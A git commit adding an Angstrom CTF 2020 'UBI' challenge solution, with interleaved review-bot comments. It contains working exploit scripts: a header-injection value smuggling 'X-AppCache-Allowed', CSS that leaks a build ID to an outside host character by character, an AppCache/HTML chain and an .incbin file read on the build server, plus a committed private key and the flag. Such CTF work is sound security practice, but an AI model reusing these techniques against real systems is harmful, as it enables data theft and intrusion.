
Add UBI from Angstrom CTF

sampritipanda committed Mar 19, 2020
1 parent 7056d8f commit e9fa4ad198d61f005e7069c2ffb6ae4813efa291
@@ -0,0 +1,11 @@
UBI
===

You could do the AppCache exploit and write a ton of exploit code that's in `solve.py`.

Or you could realize that `puppeteer` uses a outdated version of Chrome and use a already available Chrome N-day
to solve the challenge.

Exploit:
https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping/
https://blog.exodusintel.com/wp-content/uploads/2020/02/exp.zip
@@ -0,0 +1,21 @@
import sys
import requests
import hashlib
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA

privkey = open('real_privkey', 'rb').read()
keyid = hashlib.sha256(privkey).hexdigest()

file_name = sys.argv[1]

src = open(file_name, 'rb').read()
# referer = 'https://flags.2020.chall.actf.co/'
referer = None

# HOST = "http://0.0.0.0:5000"
HOST = "https://ubi.2020.chall.actf.co"

resp = requests.post(HOST + "/build", data={"src": src, "key": privkey, "referer": referer})
print resp.text.strip()
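Review bot: The response on the last line is printed without a status check, so an HTTP error body is handed to the caller as if it were build output; `resp.raise_for_status()` before the print would surface that. `keyid` and the three `Crypto` imports are never used in this file, and both `open(...).read()` calls leave the file handle to the garbage collector where `with open(file_name, 'rb') as f: src = f.read()` would close it. The `print` statement makes the script Python 2 only, which deserves a header comment because the driver script in this commit runs it as plain `python build.py`.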
@@ -0,0 +1,38 @@
import sys
import requests
import hashlib
from Cryptodome.Cipher import PKCS1_OAEP
from Cryptodome.Hash import SHA256
from Cryptodome.PublicKey import RSA
import urllib

# HOST_FLAG = "http://0.0.0.0:5001"
HOST_FLAG = "https://flags.2020.chall.actf.co"

# HOST_UBI = "http://0.0.0.0:5000"
HOST_UBI = "https://ubi.2020.chall.actf.co"

privkey = open('real_privkey', 'rb').read()
keyid = hashlib.sha256(privkey).hexdigest()
build = sys.argv[1]
key = RSA.import_key(privkey)

content_type = sys.argv[2]

# referer = 'https://flags.2020.chall.actf.co/'
referer = None
headers = {'x-ubi-src': "1\nX-AppCache-Allowed: /", 'content-type': content_type}
# headers = {'content-type': content_type}

header_string = '\n'.join(header+': '+headers[header] for header in sorted(headers.keys()))
ubi_key = SHA256.new(key.export_key('PEM', pkcs=8)+chr(10)).hexdigest()
header_string += "\nx-ubi-id: {}\nx-ubi-key: {}".format(build, ubi_key)
# print header_string
h = SHA256.new(header_string.encode('utf-8')).digest()
sig = PKCS1_OAEP.new(key).encrypt(h).encode('hex')

url = HOST_FLAG+'/download/'+build+'/flag?'+urllib.urlencode(headers)+'&sig='+sig
print url

url2 = HOST_UBI + '/' + build + '/flag?'+urllib.urlencode(headers)+'&sig='+sig
# print url2
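Review bot: This file imports from `Cryptodome` while the preceding script imports the same classes from `Crypto`, which normally means two separately installed packages for one library; pick one namespace for the whole directory. `keyid`, `referer` and `url2` are assigned but never used, and `sys.argv[1]` / `sys.argv[2]` are read with no usage message when an argument is missing. The `x-ubi-src` value on the `headers` line carries a raw LF followed by a second header line and has no comment; something like `# value embeds LF + "X-AppCache-Allowed: /"; a server that rejects CR/LF in header values taken from the request is not affected` would document both the intent and the fix. The value named `sig` is OAEP ciphertext of a SHA-256 digest rather than a signature, which is also worth a one-line comment. `urllib.urlencode` and `.encode('hex')` exist only in Python 2.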
@@ -0,0 +1 @@
actf{seize_the_means_of_c0mp1l4tion}
@@ -0,0 +1,18 @@
import sys

curr = sys.argv[1]

charset = "0123456789abcdef"

style = ""

for c in charset:
style += """
.is-parent:nth-child(5) a[href^="https://flags.2020.chall.actf.co/download/{}"] {{
background: url(https://hax.perfect.blue/exfil/{});
}}
""".format(curr+c, curr+c)

f = open("style_sice.css", "wb")
f.write(style)
f.close()
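Review bot: `curr` from `sys.argv[1]` is formatted directly into a CSS selector and a URL with no check that it is a hex prefix, although `charset` shows that is the only expected input; `if not all(ch in charset for ch in curr): sys.exit("expected a hex prefix")` would enforce that. The output file is opened and closed by hand, and a `str` is written to a `"wb"` handle, which only works on Python 2; `with open("style_sice.css", "w") as f: f.write(style)` covers both. The two host names are hard-coded in the template and would be easier to audit as named constants at the top of the file.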
@@ -0,0 +1,28 @@
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDTSKnSxPcozReK
q71KujtT6yumgj5vV1wLocoD8GCEFGYaK/KywwXcueEH9UaAx9RrnReDC5CMLw1R
zLkKCS9jvbxOEBRQ7ZH2zlfXeYwde7QrqV0HqPYl1m6L9+6aibbKnsx3ueMp1Ssr
PfZhDvC5HM9+cPKWqsWUpvOHyT9EOvMIJ3WK0HST8nYx/3YA3yBKgaU7VxI56nUc
G0BXhaVsLX3IHgDf90Vy4a1IaMXeYZanEsQGbVYQwqmC48Br1jG0ZjBprBe3kwop
WJ+1Lde+J5yFht8EtPQdNcZFqKlGrZ+Ff/iBYa4z7JT9GnEhQ11lcPl/wSllK6mu
o6Wetp/TAgMBAAECggEAduMjVAsq/FVzUr9Sc1MZgR4KYNZW5XXlwFHYh6Dh3lBQ
J5flJ/ufN9WML1svwdUvzSIHEeEXBBqRxx6IXIJQnTItXEul8ufLQ3JWcVPeqNRr
zEmvpFjJsP7ZE39+To0BQ0BZ02DQ10Aw21MxaOnsQG1awE4z4t3S8dODozt1kyEF
szmUllbNhkohhoPuqkNuyy/NaSig1p/reTyVct055tYq+MsE7cMrbqoWB0skgpvA
Qmf4P7/JsFe76l1lgxKAs1J/L/S+DIg9YNgEY3vx4mJeVV/eBfU+r2g9utw2IhgK
Y/T35GMakAk+Jlf9dB7ZoXFvdASof919FLOrJhzGkQKBgQD/RzHUhI1rU+ivjG2H
Sn2/9IpeM9p1VK7/sJ1tQLmziVP3dIegLMgGcf5nBN5+QuzmLRR4UvlQpFowvxB2
h1RhULh/IJPBmy7usWwlPREKt05nzQxk05n93KnfaXXjQHztffEcu80MkkSeC4dd
mW3RxMSFggzLofzH5F7aEbcUewKBgQDT4Z6gUumlHj83fAMXuzfgbNtDKa7KJgfR
BLjHNxJ/fRDP5edoGgQCj4dA5SC4mM8hb4Qq5SMGn5+Kcg2r87W/qQ4wjpP3Yq0/
sPMSWYKGvmLaktn2MqpYKhqA2o94VYzHE+Jw8F7/c5qws1FWRSsGIYmXUpjy33U9
T+PYH87eiQKBgQDIZSQ592Bo67LS9EMbHKAAq0Bf2QbaaoMCF6xNkqz0wo5WyHSb
ievwG1ahmpHqvjDoNGVIW6J56rseXy7WTUAxMMPUkEdNibvbBw6lYP3a0rFLDQ14
rR/KyInV5xzzK7GmYeKAMvExuDUDeHtoP8SVEolPYRsYU+5zINRRDe0RtwKBgB0E
JeQQ1rxtEv03N3k1g2ZxoelluPEoGiPuwJtPmHHrH7VI59Li1S/AliY1+rAtBRiw
G+p/7LcIfyHHksW8n2Q6852EuRDE67LwOamGppBrXEBQohbMQ3XFdlG1HLa/CINu
3rDWyjuzijiupfHpkQXK6/vULOv93CFkYnCDkqH5AoGBALLC6s9OdQBCGGqczgak
hRRXn6ZRjYQIVDGBUDDQzLPjTyR8pjc2aqeyx77aWr/drUza7G6QNFoR/mIvtk0s
suq+EFZM2n3YHG/bQpDTZS9vTBS42o1isI5VxNF86tRcjq+oyGWrUQc1oU6TbBYw
Js1ZaJoAO4s4xU80kcdhwRI9
-----END PRIVATE KEY-----
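Review bot: This section commits a complete, unencrypted PKCS#8 private key. Once pushed it stays retrievable from history even if a later commit deletes the file, so the key has to be treated as public from here on and must not be reused anywhere outside the challenge. If the scripts only need it at run time (they read `real_privkey` from the working directory, presumably this file), loading the path from an argument or environment variable and listing the file in `.gitignore` keeps it out of the repository. If it is kept deliberately as a challenge artifact, a line in the README saying so would spare secret-scanning triage later.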
@@ -0,0 +1,52 @@
import subprocess
import requests
import re
import json

manifest_fmt = """CHROMIUM CACHE MANIFEST
NETWORK:
*
FALLBACK:
CHROMIUM-INTERCEPT:
/style.css return {}
CACHE:
/"""

html_fmt = """
<html manifest="{}">
<meta http-equiv="refresh" content="3;url=https://flags.2020.chall.actf.co/" />
</html>
"""

curr = "4282bb2f3f3e94cb"
for i in range(len(curr), 16):
subprocess.check_output(["python", "gen_injection.py", curr])
build_output = subprocess.check_output(["python", "build.py", "style_sice.css"])
build_id = re.search('build/(.+)/source.c', json.loads(build_output)['message']).group(1)
print build_id
css_url = subprocess.check_output(["python", "download.py", build_id, "text/css"]).strip()
print css_url
manifest = manifest_fmt.format(css_url.replace("https://flags.2020.chall.actf.co", ""))
with open("manifest.txt", "wb") as f:
f.write(manifest)
build_output = subprocess.check_output(["python", "build.py", "manifest.txt"])
build_id = re.search('build/(.+)/source.c', json.loads(build_output)['message']).group(1)
print build_id
manifest_url = subprocess.check_output(["python", "download.py", build_id, "text/cache-manifest"]).strip()
print manifest_url
html_src = html_fmt.format(manifest_url.replace("https://flags.2020.chall.actf.co", ""))
with open("attack.html", "wb") as f:
f.write(html_src)
build_output = subprocess.check_output(["python", "build.py", "attack.html"])
build_id = re.search('build/(.+)/source.c', json.loads(build_output)['message']).group(1)
print build_id
html_url = subprocess.check_output(["python", "download.py", build_id, "text/html"]).strip()
print html_url
requests.post("https://flags.2020.chall.actf.co/submit", data={"url": html_url})

next_char = raw_input("Next Char: ").strip()
curr += next_char
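Review bot: Each of the three `re.search('build/(.+)/source.c', ...).group(1)` lines raises a bare AttributeError when the build message does not contain the expected path, and the pattern has a greedy `(.+)` and an unescaped `.`; `r'build/([^/]+)/source\.c'` with an explicit `if m is None:` check would fail with a readable message. The build, parse and download sequence is written out three times and differs only in file name and content type, so it would read better as one helper taking those two arguments. The result of the `requests.post` on the submit line is discarded, so a rejected submission goes unnoticed, and the `raw_input` value is appended to `curr` without checking that it is a single hex character. The loop variable `i` is unused.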
@@ -0,0 +1,7 @@
#include <stdio.h>

int main() {
asm("data:\n"
".incbin \"build/6d60558594d850e0/config.json\"");
}
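Review bot: Nothing in this file says what it is for: the `asm` block uses the assembler's `.incbin` directive to copy `build/6d60558594d850e0/config.json` from the build host into the compiled object, and that is the program's only effect. A header comment such as `/* embeds a file from the build directory via .incbin; only works where the build service lets the assembler read paths outside the submitted source */` would make the intent and the relevant hardening (sandboxing the compiler's filesystem view) explicit. `main` also ends without `return 0;`, which is legal from C99 on but worth writing out.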
